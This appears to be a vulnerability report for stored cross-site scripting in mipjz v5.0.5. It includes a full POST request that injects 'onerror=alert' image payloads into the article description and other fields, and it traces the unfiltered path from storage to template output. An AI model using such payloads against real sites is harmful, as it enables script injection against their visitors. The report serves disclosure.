mipjz copied to clipboard
There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5
[Vulnerability Description] Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] https://github.com/sansanyun/mipjz http://www.mipjz.com/
[Affected Product Code Base] v5.0.5
[Vulnerability Proof]
- Add an article, insert js code in the description parameter: xss
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 426
Connection: close
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss<img src onerror=alert(1)>","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
- Visit the article page, the code is loaded and executed
[Code Details]
- Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing
- \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database
- Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering
- In the "guess you like" area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed
What level of authentication does this require?